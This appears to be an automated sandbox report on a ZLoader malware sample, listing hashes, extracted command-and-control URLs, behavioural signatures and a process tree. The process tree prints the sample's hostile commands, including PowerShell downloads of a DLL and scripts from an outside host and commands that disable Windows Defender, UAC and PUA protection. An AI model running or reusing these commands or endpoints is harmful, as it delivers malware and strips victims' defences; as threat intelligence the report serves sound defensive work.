Analysis
-
max time kernel
56s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-08-2021 11:42
Static task
static1
Behavioral task
behavioral1
Sample
8f87fe90d589a4fa73cff6a242fe222b.exe
Resource
win7v20210410
Errors
General
-
Target
8f87fe90d589a4fa73cff6a242fe222b.exe
-
Size
165KB
-
MD5
8f87fe90d589a4fa73cff6a242fe222b
-
SHA1
381e33872d0f6f1a7233beeb6e9524435c2a9ab6
-
SHA256
edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
-
SHA512
f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted
zloader
ivan
ivan
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1544 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1908 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 8f87fe90d589a4fa73cff6a242fe222b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8f87fe90d589a4fa73cff6a242fe222b.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1052 timeout.exe 1896 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
regsvr32.exepid process 1924 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1544 powershell.exe 1544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1544 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.execmd.exeregsvr32.exedescription pid process target process PID 2028 wrote to memory of 1380 2028 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 2028 wrote to memory of 1380 2028 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 2028 wrote to memory of 1380 2028 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 1380 wrote to memory of 1544 1380 cmd.exe powershell.exe PID 1380 wrote to memory of 1544 1380 cmd.exe powershell.exe PID 1380 wrote to memory of 1544 1380 cmd.exe powershell.exe PID 1380 wrote to memory of 1924 1380 cmd.exe regsvr32.exe PID 1380 wrote to memory of 1924 1380 cmd.exe regsvr32.exe PID 1380 wrote to memory of 1924 1380 cmd.exe regsvr32.exe PID 1380 wrote to memory of 1924 1380 cmd.exe regsvr32.exe PID 1380 wrote to memory of 1924 1380 cmd.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe PID 1924 wrote to memory of 1908 1924 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\system32\regsvr32.exeregsvr32 JavaP.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\regsvr32.exeJavaP.dll4⤵
- Loads dropped DLL
PID:1908 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵PID:1900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat3⤵PID:1648
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:656
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe4⤵PID:1544
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵PID:304
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T sc config WinDefend start= disabled4⤵PID:1504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat4⤵PID:1660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵PID:1592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵PID:1172
-
C:\Windows\system32\shutdown.exeshutdown.exe /r /f /t 004⤵PID:1540
-
C:\Windows\system32\timeout.exetimeout 163⤵
- Delays execution with timeout.exe
PID:1052 -
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:1236
-
C:\Windows\system32\timeout.exetimeout 163⤵
- Delays execution with timeout.exe
PID:1896
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:1112
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1064
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5f848f5b5d033acff608f726d5f59e67e
SHA1606fece7d327edbfe6bcf5c7f6db89a8438175ec
SHA256c89fa727d959f1e5829db45c84505f8ff90e3321ada6d8c26d1d5d32cfbffeb4
SHA512d406d962cfccdaf9d37e0ba4b439f5ba330e64e51eb9831347cc35291e1a610de5931313c2bc5055163c292c90457cb12e6bff43d36ad5fa6ea9f5d4cd135d35
-
MD5
676d31dd4a8405ead757e0b72d6bd381
SHA1789a5fc1af78a0630ae705f6dd5506dd476d9d0f
SHA25657d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7
SHA51279cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD537201477b58552b2766848acfa92734e
SHA13f193d83ebd8d767a3f5e2b7f4a847fd8deed308
SHA2565b5d7d0fe081affdfbb88041e46b31e073c6a9f7db8c54c1ae7cfeaf7bcb92bc
SHA512394edda9ccc6f2d2109403c8bb750abcf88bed0afd85fa06da7e1897dd90ea0867fd39bcffd702545927a4cf2f8ace35debe28e337982c546f3373c66cc592a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD537201477b58552b2766848acfa92734e
SHA13f193d83ebd8d767a3f5e2b7f4a847fd8deed308
SHA2565b5d7d0fe081affdfbb88041e46b31e073c6a9f7db8c54c1ae7cfeaf7bcb92bc
SHA512394edda9ccc6f2d2109403c8bb750abcf88bed0afd85fa06da7e1897dd90ea0867fd39bcffd702545927a4cf2f8ace35debe28e337982c546f3373c66cc592a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD537201477b58552b2766848acfa92734e
SHA13f193d83ebd8d767a3f5e2b7f4a847fd8deed308
SHA2565b5d7d0fe081affdfbb88041e46b31e073c6a9f7db8c54c1ae7cfeaf7bcb92bc
SHA512394edda9ccc6f2d2109403c8bb750abcf88bed0afd85fa06da7e1897dd90ea0867fd39bcffd702545927a4cf2f8ace35debe28e337982c546f3373c66cc592a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD537201477b58552b2766848acfa92734e
SHA13f193d83ebd8d767a3f5e2b7f4a847fd8deed308
SHA2565b5d7d0fe081affdfbb88041e46b31e073c6a9f7db8c54c1ae7cfeaf7bcb92bc
SHA512394edda9ccc6f2d2109403c8bb750abcf88bed0afd85fa06da7e1897dd90ea0867fd39bcffd702545927a4cf2f8ace35debe28e337982c546f3373c66cc592a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD537201477b58552b2766848acfa92734e
SHA13f193d83ebd8d767a3f5e2b7f4a847fd8deed308
SHA2565b5d7d0fe081affdfbb88041e46b31e073c6a9f7db8c54c1ae7cfeaf7bcb92bc
SHA512394edda9ccc6f2d2109403c8bb750abcf88bed0afd85fa06da7e1897dd90ea0867fd39bcffd702545927a4cf2f8ace35debe28e337982c546f3373c66cc592a7
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
6f10d512d4cbb527fd26ae266d0a4aef
SHA16e42d51ff2d42c5f999943b329a655e901ea4b32
SHA256b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943
SHA5124f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481